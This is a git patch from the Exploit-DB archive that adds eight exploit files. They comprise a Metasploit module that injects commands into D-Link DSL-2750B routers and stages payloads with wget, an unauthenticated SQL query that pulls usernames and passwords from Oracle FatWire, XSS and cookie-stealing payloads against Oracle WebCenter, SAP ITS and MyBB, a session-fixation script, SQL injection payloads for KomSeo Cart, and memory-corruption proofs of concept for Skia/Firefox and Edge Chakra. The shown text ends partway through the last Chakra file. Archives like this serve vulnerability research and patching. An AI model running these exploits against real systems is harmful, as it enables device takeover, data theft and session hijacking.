From 608176a851af28b5832a5aacd754b2d5d12062bd Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 26 May 2018 05:01:44 +0000
Subject: [PATCH] DB: 2018-05-26

8 changes to exploits/shellcodes

Microsoft Edge Chakra - Cross Context Use-After-Free
Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write

D-Link DSL-2750B - OS Command Injection (Metasploit)
KomSeo Cart 1.3 - 'my_item_search' SQL Injection
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Scripting
SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control
Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting
---
 exploits/hardware/remote/44760.rb   | 114 ++++++++++++++++
 exploits/linux/webapps/44757.txt    |  61 +++++++++
 exploits/multiple/dos/44759.html    | 193 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/44752.txt |  55 ++++++++
 exploits/multiple/webapps/44755.py  |  60 +++++++++
 exploits/php/webapps/44753.txt      |  50 +++++++
 exploits/php/webapps/44754.txt      |  19 +++
 exploits/windows/dos/44758.html     | 127 ++++++++++++++++++
 files_exploits.csv                  |   8 ++
 9 files changed, 687 insertions(+)
 create mode 100755 exploits/hardware/remote/44760.rb
 create mode 100644 exploits/linux/webapps/44757.txt
 create mode 100644 exploits/multiple/dos/44759.html
 create mode 100644 exploits/multiple/webapps/44752.txt
 create mode 100755 exploits/multiple/webapps/44755.py
 create mode 100644 exploits/php/webapps/44753.txt
 create mode 100644 exploits/php/webapps/44754.txt
 create mode 100644 exploits/windows/dos/44758.html

diff --git a/exploits/hardware/remote/44760.rb b/exploits/hardware/remote/44760.rb
new file mode 100755
index 000000000..1774ede1b
--- /dev/null
+++ b/exploits/hardware/remote/44760.rb
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link DSL-2750B OS Command Injection',
+      'Description'    => %q(
+        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
+        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
+        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
+      ),
+      'Author'         =>
+        [
+          'p@ql', # vulnerability discovery
+          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['PACKETSTORM', 135706],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
+          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
+        ],
+      'Targets'        =>
+        [
+          [
+            'Linux mipsbe Payload',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Linux mipsel Payload',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'DisclosureDate'  => 'Feb 5 2016',
+      'DefaultTarget'   => 0))
+
+    deregister_options('CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/ayefeaturesconvert.js'
+    )
+
+    unless res
+      vprint_error('Connection failed')
+      return CheckCode::Unknown
+    end
+
+    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
+      vprint_status('Remote host is not a DSL-2750')
+      return CheckCode::Safe
+    end
+
+    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
+      version = Regexp.last_match[1]
+      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
+      if version >= "1.01" && version <= "1.03"
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    vprint_error('Connection failed')
+    return CheckCode::Unknown
+  end
+
+  def execute_command(cmd, _opts)
+    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
+    send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => '/login.cgi',
+        'vars_get' => {
+          'cli' => "#{payload}$"
+        },
+        'encode_params' => false
+      },
+      5
+    )
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
+  end
+
+  def exploit
+    print_status("#{peer} Checking target version...")
+
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+
+    execute_cmdstager(
+      flavor: :wget,
+      linemax: 200
+    )
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/44757.txt b/exploits/linux/webapps/44757.txt
new file mode 100644
index 000000000..8816f366c
--- /dev/null
+++ b/exploits/linux/webapps/44757.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Oracle WebCenter FatWire Content Server < 7 - Improper Access Control
+# Dork: inurl:Satellite?pagename
+# Date: 2017-10-17
+# Exploit Author: Sebastian Cornejo Olave
+# Vendor Homepage: http://oracle.com
+# Version: 5.5.2 ,7.5 <=
+# CVE: CVE-2017-10033
+# Category: Webapps
+# Tested on: Kali linux
+
+# VULNERABILITY DESCRIPTION
+# It has been discovered that there is an incorrect access control over
+# several resources in previous versions of Fatwire (confirmed
+# FutureTenseContentServer 5.5.2 ,7.5) that allow the sending of SQL
+# queries and query the tables and database schema without authentication.
+
+# PoC : Improper Access Control
+
+PAYLOAD : SQL query
+
+POST /cs/Satellite HTTP/1.1
+Host: www.example.com
+User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
+Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 98
+
+tbl=AArticles&query=select+username%2Cpassword+from+systemusers&pagename=Support%2FVerify%2Fexport
+
+
+PAYLOAD : show all table database
+https://www.example.com/cs/Satellite?pagename=Support/Verify/tablelistHTML
+https://www.example.com/cs/Satellite?pagename=Support/CacheManager/FlushTables&cmd=null
+
+OR request
+
+POST /cs/Satellite HTTP/1.1
+Host: www.example.com
+User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101
+Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 98
+
+pagename=Support/Verify/tablelistHTML
+
+
+PAYLOAD : URL list ID installed Site
+
+https://www.example.com/cs/Satellite?pagename=OpenMarket/Demos/index
+
+# Collaborators
+# Vis0r
+# Queseguridad
\ No newline at end of file
diff --git a/exploits/multiple/dos/44759.html b/exploits/multiple/dos/44759.html
new file mode 100644
index 000000000..a82167623
--- /dev/null
+++ b/exploits/multiple/dos/44759.html
@@ -0,0 +1,193 @@
+<!--
+Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674
+Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941
+
+
+In Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:
+
+(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369
+(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382
+(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383
+
+and possibly others
+
+In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as
+
+fReserve * sizeof(T)
+sizeof(T) * count
+
+etc. are used.
+
+An integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element.
+
+I have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths.
+
+The PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows.
+
+PoC program for Skia
+
+=================================================================
+
+#include <stdio.h>
+
+#include "SkCanvas.h"
+#include "SkPath.h"
+#include "SkGradientShader.h"
+#include "SkBitmap.h"
+#include "SkDashPathEffect.h"
+
+int main (int argc, char * const argv[]) {
+
+    SkBitmap bitmap;
+    bitmap.allocN32Pixels(500, 500);
+
+    //Create Canvas
+    SkCanvas canvas(bitmap);
+
+    SkPaint p;
+    p.setAntiAlias(false);
+    float intervals[] = { 0, 10e9f };
+    p.setStyle(SkPaint::kStroke_Style);
+    p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0));
+
+    SkPath path;
+    
+    unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0};
+    path.moveTo(0, 0);
+    unsigned numpoints = 1;
+    unsigned i = 1;
+    unsigned qaindex = 0;
+    while(numpoints < 2147483647) {
+      if(numpoints == quadraticarr[qaindex]) {
+        path.quadTo(i, 0, i, 0);
+        qaindex++;
+        numpoints += 2;
+      } else {
+        path.lineTo(i, 0);
+        numpoints += 1;
+      }
+      i++;
+      if(i == 1000000) {
+        path.moveTo(0, 0);
+        numpoints += 1;
+        i = 1;
+      }
+    }
+
+    printf("done building path\n");
+
+    canvas.drawPath(path, p);
+
+    return 0;
+}
+
+=================================================================
+
+ASan output:
+
+ASAN:DEADLYSIGNAL
+=================================================================
+==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0)
+    #0 0x7ff2dac9cf65  (/lib/x86_64-linux-gnu/libc.so.6+0x83f65)
+    #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c)
+    #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17
+    #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21
+    #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9
+    #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688
+    #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14
+    #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12
+    #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24
+    #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18
+    #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9
+    #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226
+    #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9
+    #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5
+    #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5
+    #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519)
+
+The issue can also be triggered via the web in Mozilla Firefox
+
+PoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer)
+
+=================================================================
+-->
+
+<canvas id="canvas" width="64" height="64"></canvas>
+<br>
+<button onclick="go()">go</button>
+<script>
+var canvas = document.getElementById("canvas");
+var ctx = canvas.getContext("2d");
+
+function go() {
+  ctx.beginPath();
+
+  ctx.mozImageSmoothingEnabled = false;
+  ctx.webkitImageSmoothingEnabled = false;
+  ctx.msImageSmoothingEnabled = false;
+  ctx.imageSmoothingEnabled = false;
+
+  linedasharr = [0, 1e+37];
+  ctx.setLineDash(linedasharr);
+
+  quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613];
+  ctx.moveTo(0, 0);
+  numpoints = 1;
+  i = 1;
+  qaindex = 0;
+  while(numpoints < 2147483647) {
+    if(numpoints == quadraticarr[qaindex]) {
+      ctx.quadraticCurveTo(i, 0, i, 0);
+      qaindex++;
+      numpoints += 2;
+    } else {
+      ctx.lineTo(i, 0);
+      numpoints += 1;
+    }
+    i++;
+    if(i == 1000000) {
+      ctx.moveTo(0, 0);
+      numpoints += 1;
+      i = 1;
+    }
+  }
+
+  alert("done building path");
+
+  ctx.stroke();
+
+  alert("exploit failed");
+}
+
+</script>
+
+<!--
+=================================================================
+
+ASan output:
+
+AddressSanitizer:DEADLYSIGNAL
+=================================================================
+==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0)
+==37732==The signal is caused by a WRITE memory access.
+    #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17
+    #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342
+    #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15
+    #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688
+    #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19
+    #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12
+    #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37
+    #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25
+    #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15
+    #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235
+    #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23
+    #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12
+    #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11
+    #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13
+    #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
+    #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
+    #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
+    #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14
+    #18 0x1a432b56061a  (<unknown module>)
+-->
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44752.txt b/exploits/multiple/webapps/44752.txt
new file mode 100644
index 000000000..061ea3fed
--- /dev/null
+++ b/exploits/multiple/webapps/44752.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Multiple XSS Oracle WebCenter Sites (FatWire Content
+Server) 7.x < 11gR1
+# Dork: inurl:Satellite?c
+# Date: 18.12.201
+# Exploit Author: Richard Alviarez
+# Vendor Homepage: http://oracle.com
+# Version: 7.x < 11gR1
+# CVE: CVE-2018-2791
+# Category: Webapps
+# Tested on: Kali linux
+====================================================
+
+# VULNERABILITY DESCRIPTION
+
+ The backend of the Content Server is prone to permanent and reflected
+ Cross-Site Scripting attacks. The vulnerability can be used to include
+ HTML- or JavaScript code to the affected web page. The code is executed
+ in the browser of users if they visit the manipulated site.
+ The vulnerability can be used to change the contents of the displayed
+site,
+ redirect to other sites or steal user credentials. Additionally, Portal
+ users are potential victims of browser exploits and JavaScript Trojans.
+
+====================================================
+
+
+# PoC : XSS :
+
+
+PAYLOAD:
+
+servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(123)%3C/script%3E%3C
+
+Note: {ID} Change for ID to site example (1362484193835)
+
+Other vulnerable parameters:
+
+PAYLOAD:
+
+servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee"<scriptalert(document.cookie)</script
+
+
+PAYLOAD:
+
+servlet/Satellite?destpage="<h1xxx<scriptalert(1)</script&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError
+
+====================================================
+
+
+#Collaborators
+
+- CuriositySec
+- Vis0r
+- Oxd0m7
+- Vict0r
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44755.py b/exploits/multiple/webapps/44755.py
new file mode 100755
index 000000000..bd9823189
--- /dev/null
+++ b/exploits/multiple/webapps/44755.py
@@ -0,0 +1,60 @@
+ # Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting
+# Dork: /scripts/wgate/
+# Date: 25.05.2018
+# Exploit Author: J. Carrillo Lencina (0xd0m7)
+# Vendor Homepage: https://www.sap.com
+# Version: SAP ITS 6200.X.X
+# Category: Webapps
+# Tested on: All Platforms
+# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11415
+# Description:As it has been determined that there are two
+vulnerabilities in the latest developed version of SAP ITS, these two
+vulnerabilities added together give rise to an XSS.
+
+#Technical details: It has been determined that when an unauthenticated
+user navigates through the application, the application assigns a cookie,
+that cookie is assigned in the parameter ~ session, therefore it could be
+possible for an attacker to fix the fallo ~ session through a request GET
+This, together with the fact that the parameter SERVICEUNIQUE has a
+parameter validation failure, results in a single-use XSS, since the
+session expires once the method of the request is exchanged and fixed in
+the URL.
+
+#Exploit
+#!/usr/bin/python
+import argparse
+import requests
+import re
+ 
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url", help="Example: https://example.com/wgate/scripts/ralp/!")
+args = parser.parse_args()
+list=[]
+i=0
+cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}
+url=args.url.split('/')
+url2='https://'+str(url[2])+'/'+str(url[3])+'/'+str(url[4])+'/'
+
+if args.url:
+	r = requests.get(args.url,verify=False,cookies=cookie)
+	header = r.headers['Set-Cookie']
+	cookie_val = header.split(";")
+
+	for line in r.iter_lines():
+        	list.append(line)
+        	i=i+1
+        	if line.find('~SERVICEUNIQUE') > 0:
+                	param = line.replace('"','')
+                	v = param.split('=')
+                	val0 = v[3].split(' ')
+			print '[+]Random Value:',val0[0]
+
+	for line2 in range(len(cookie_val)):
+        	if cookie_val[line2].find('~session') == 0:
+                	val1 = cookie_val[line2].split('=')
+			print '[+]Session Value:',val1[1]
+	print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]
+
+
+else:
+	print '[!] Empty URL, please see help (-h,--help)'
\ No newline at end of file
diff --git a/exploits/php/webapps/44753.txt b/exploits/php/webapps/44753.txt
new file mode 100644
index 000000000..fadd94f1f
--- /dev/null
+++ b/exploits/php/webapps/44753.txt
@@ -0,0 +1,50 @@
+# Exploit Title: KomSeo Cart 1.3 - 'edit.php' SQL Injection
+# Dork: N/A
+# Date: 25.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: SITEMAKIN
+# Vendor Homepage: https://sitemakin.com
+# Version: 1.3
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands
+from the user search section with 'my_item_search' parameter.
+====================================================
+# Demo : https://sitemakin.com/phpcart/
+# PoC : SQLi :
+
+https://test.com/phpcart/edit.php
+
+POST /phpcart/edit.php HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://test.com/phpcart/edit.php
+Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c;
+_ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1473500504.1527224530
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 40
+my_item_search=test&submit_search=Search
+
+
+Parameter: my_item_search (POST)
+
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: my_item_search=-5021' OR 3148=3148#&submit_search=Search
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload: my_item_search=test' AND (SELECT 8609 FROM(SELECT
+COUNT(*),CONCAT(0x7170787671,(SELECT
+(ELT(8609=8609,1))),0x7178707071,FLOOR(RAND(0)*2))x FROM
+             INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
+voqa&submit_search=Search
+
+
+====================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/44754.txt b/exploits/php/webapps/44754.txt
new file mode 100644
index 000000000..0fb38ad69
--- /dev/null
+++ b/exploits/php/webapps/44754.txt
@@ -0,0 +1,19 @@
+# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Scripting
+# Date: 2018-05-17
+# Author: 0xB9
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105
+# Version: 1.1
+# Tested on: Ubuntu 18.04
+# CVE: N/A
+
+# 1. Description:
+# The plugin allows moderators to save notes and display them in a list in the modCP.
+# The XSS is located in the mod notes textarea.
+ 
+# 2. Proof of Concepts:
+
+Go to the modCP and save the following payload in the moderator notes  <script>alert(\'XSS\')</script>
+
+The alert will appear on the modCP and ACP.
+localhost/modcp.php
+localhost/admin/index.php?module=tools-modnoteslog
\ No newline at end of file
diff --git a/exploits/windows/dos/44758.html b/exploits/windows/dos/44758.html
new file mode 100644
index 000000000..d3af07b9e
--- /dev/null
+++ b/exploits/windows/dos/44758.html
@@ -0,0 +1,127 @@
+<!--
+1. Background
+The CrossSite class is used for passing JavaScript variables across different contexts. Chakra is basically trying to wrap every variable being passed from a context to another context. The way it wraps an object is, first overwrite the virtual function table pointer of the given object, checks and wraps all inputs and outputs in the overridden methods. The reason for doing it is because direct access to a closed context may cause unexpected behaviors such as Use-After-Free.
+
+Use-After-Free
+The addresses of some objects such as string constants are directly inlined into JITed code. When closing a context, the context loses the references to those objects. And since the garbage collector doesn't scan those JITed code area for garbage collection, the following code could have caused Use-After-Free.
+
+Code:
+let f = document.body.appendChild(document.createElement('iframe'));
+let opt = f.contentWindow.eval(`
+    function opt() {
+        return 'xxxx';
+    }
+
+    // Optimizing "opt", so that the address of 'xxxx' can be inlineed.
+    for (let i = 0; i < 100000; i++) {
+        opt();
+    }
+
+    opt;
+`);
+
+f.onload = () => {
+    f.onload = null;
+
+    // Garbage collection
+    for (let i = 0; i < 10; i++)
+        new ArrayBuffer(1024 * 1024 * 40);
+
+    let obj = opt();  // "opt" returns the freed string constant.
+};
+
+// Closing the diffrent context
+f.src = 'about:blank';
+
+But in fact, if you run the code, you will see an exception saying "Can't execute code from a freed script". That is what the ClassSite class do. The class caught the call to the "opt" function, threw the exception. In other words, if we can fetch the "opt" function from the different context without having it wrapped, it can lead to Use-After-Free. I figured out that there would be so many ways for it.
+
+2. Bug
+Here's the first bug.
+    Var DataView::EntryGetterBuffer(RecyclableObject* function, CallInfo callInfo, ...)
+    {
+        ...
+        ARGUMENTS(args, callInfo);
+        ScriptContext* scriptContext = function->GetScriptContext();
+        ...
+        DataView* dataView = DataView::FromVar(args[0]);
+        ArrayBufferBase* arrayBuffer = dataView->GetArrayBuffer();
+        ...
+        return arrayBuffer;
+    }
+
+As you can see, it directly returns the ArrayBuffer object without wrapping it. Since the DataView class also doesn't wrap the object in the MarshalToScriptContext method which is called when an object gets wrapped, the ArrayBuffer object will never have a chance to be wrapped.
+
+It seems this is a common vulnerable code pattern in Chakra. I will separately report other vulnerable methods.
+
+PoC:
+let f = document.body.appendChild(document.createElement('iframe'));
+let wrapped_dv = f.contentWindow.eval(`
+    function opt() {
+        return 'xxxx';
+    }
+
+    // Optimizing "opt", so that the address of 'xxxx' can be inlineed.
+    for (let i = 0; i < 100000; i++) {
+        opt();
+    }
+
+    let dv = new DataView(new ArrayBuffer(0));
+    dv.buffer.opt = opt;
+    dv;
+`);
+
+let buffer = DataView.prototype.__lookupGetter__('buffer').call(wrapped_dv);
+let opt = buffer.opt;
+
+f.onload = () => {
+    f.onload = null;
+
+    // Garbage collection
+    for (let i = 0; i < 10; i++)
+        new ArrayBuffer(1024 * 1024 * 40);
+
+    let obj = opt();  // "opt" returns the freed string constant.
+    alert(obj);
+};
+
+// Closing the diffrent context
+f.src = 'about:blank';
+-->
+
+<body>
+<script>
+let f = document.body.appendChild(document.createElement('iframe'));
+let wrapped_dv = f.contentWindow.eval(`
+    function opt() {
+        return 'xxxx';
+    }
+
+    // Optimizing "opt", so that the address of 'xxxx' can be inlineed.
+    for (let i = 0; i < 100000; i++) {
+        opt();
+    }
+
+    let dv = new DataView(new ArrayBuffer(0));
+    dv.buffer.opt = opt;
+    dv;
+`);
+
+let buffer = DataView.prototype.__lookupGetter__('buffer').call(wrapped_dv);
+let opt = buffer.opt;
